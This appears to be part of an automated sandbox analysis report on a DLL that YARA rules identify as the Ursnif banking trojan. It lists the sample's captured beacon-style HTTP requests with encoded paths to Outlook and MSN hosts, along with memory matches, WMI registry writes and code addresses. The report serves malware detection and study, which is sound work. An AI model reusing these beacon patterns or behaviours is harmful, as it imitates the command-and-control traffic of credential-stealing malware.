                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 6f408bdb-1e4d-c6ec-fa40-6761089e1892Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: DB9PR05CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: DB9PR05CA0008.EURPRD05.PROD.OUTLOOK.COMX-CalculatedBETarget: DB8P195MB0662.EURP195.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: 24tAb00e7Mb6QGdhCJ4Ykg.1.1X-FEServer: DB9PR05CA0008X-Powered-By: ASP.NETX-FEServer: AM6P195CA0054Date: Mon, 11 Oct 2021 22:37:50 GMTConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 0ad922d7-711b-417c-0004-37a25225c4eaStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: DU2PR04CU012.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: DU2PR04CA0336.EURPRD04.PROD.OUTLOOK.COMX-CalculatedBETarget: DB7P194MB0346.EURP194.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: 1yLZChtxfEEABDeiUiXE6g.1.1X-FEServer: DU2PR04CA0336X-Powered-By: ASP.NETX-FEServer: AM5P194CA0019Date: Mon, 11 Oct 2021 22:37:54 GMTConnection: close
                      Source: WerFault.exe, 0000000D.00000002.542863916.00000000052E4000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000002.555554795.0000000004A95000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.566895044.0000000004E23000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmpString found in binary or memory: http://ogp.me/ns#
                      Source: loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmpString found in binary or memory: http://ogp.me/ns/fb#
                      Source: loaddll32.exe, 00000000.00000003.527111263.0000000003B28000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531230770.00000000055A8000.00000004.00000040.sdmpString found in binary or memory: https://blogs.msn.com/
                      Source: loaddll32.exe, 00000000.00000003.527111263.0000000003B28000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531809993.00000000055AB000.00000004.00000040.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633991829&rver
                      Source: rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633991831&rver
                      Source: loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmpString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=en-us"
                      Source: loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/en-us//api/modules/cdnfetch"
                      Source: loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/en-us/homepage/_sc/css/d7cb56b9-3a82770e/direct
                      Source: WerFault.exe, 00000013.00000003.567391017.0000000004E8D000.00000004.00000001.sdmpString found in binary or memory: https://watson.telemetry.m
                      Source: loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmpString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
                      Source: loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2f881KeBhik38%2fn4I3jisQrsLf3N%2f5T7WW0TVyqLiEqrYpioXw
                      Source: rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fI2vyCwQZ_2BZdOw7_2FC5%2fQHqYyNs8nTjA1r7w%2fN6UkSzFGk
                      Source: loaddll32.exe, 00000000.00000003.527597302.0000000003AA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.531625301.0000000005529000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/en-us//api/modules/fetch"
                      Source: unknownDNS traffic detected: queries for: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/881KeBhik38/n4I3jisQrsLf3N/5T7WW0TVyqLiEqrYpioXw/gsBY_2B0auYDQzqy/fq_2B0_2B1d5s1X/dE8U_2Bi9e1uHEa_2F/5gbQOA71j/4SGjjTuSnP5G5SL6XFKB/ya3reo77Dd0XJ5txbLh/Z2Jzwc_2FxPLynamqWy_2B/SzxjiUxPyCdZ8/5vaLjUU_/2FbRmdxDVJSYut_2BRUXs8y/S.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/I2vyCwQZ_2BZdOw7_2FC5/QHqYyNs8nTjA1r7w/N6UkSzFGkH0f_2F/1IQh_2Bz24bnmMcZ4_/2BpWpgK6a/MfYXdR3sp4DYLa3d1zd1/q_2BesRlkaXfNl4zUpH/oAvtXyz6Z7BEsY_2FVEEFG/s2tbS3iXa95no/TNlgDymJ/mAsry_2BV2k9xkYk3dzUg9O/zullnql4G3/M32YonxJQXyLafjIm/_2FKjkdabgYHJ/uSKzerPj.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49756 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.153.146:443 -> 192.168.2.3:49784 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.223.66:443 -> 192.168.2.3:49785 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.151.2:443 -> 192.168.2.3:49786 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.153.146:443 -> 192.168.2.3:49787 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.135.82:443 -> 192.168.2.3:49788 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49789 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.527111263.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527630553.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.615631858.00000000038AD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531230770.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531464419.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527327468.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576012668.000000000542B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531480606.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527187841.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.659429998.00000000037AF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531370717.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527048423.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531284421.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531412078.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531686708.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531172047.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.570679066.00000000039AB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.624467221.000000000532D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.667937639.000000000522F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.526903678.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531440376.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527256439.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.526968624.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527017763.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6316, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.2eb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.3030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e710000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e710000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2dca31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2a0a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2dca31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2a0a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.265a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.265a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e7a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d394a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.143a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e7a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.143a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d394a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.697257309.0000000004D39000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.454711091.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.488040276.0000000002650000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.696204071.0000000003579000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.491247065.0000000001430000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.453838951.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.476882523.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.527111263.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527630553.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.615631858.00000000038AD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531230770.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531464419.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527327468.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576012668.000000000542B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531480606.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527187841.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.659429998.00000000037AF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531370717.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527048423.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531284421.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531412078.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531686708.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531172047.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.570679066.00000000039AB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.624467221.000000000532D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.667937639.000000000522F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.526903678.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531440376.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527256439.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.526968624.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527017763.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6316, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.2eb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.3030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e710000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e710000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2dca31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2a0a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2dca31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2a0a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.265a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.265a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e7a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d394a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.143a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e7a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.143a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d394a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.697257309.0000000004D39000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.454711091.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.488040276.0000000002650000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.696204071.0000000003579000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.491247065.0000000001430000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.453838951.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.476882523.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: m87xfb63XU.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 632
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7121B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0303AF24
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03032B76
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03034C40
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E725600
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E75D630
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E773CCE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E75B597
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E77FA78
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E76A2B1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E77FB98
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E74E8C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E725600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E75D630
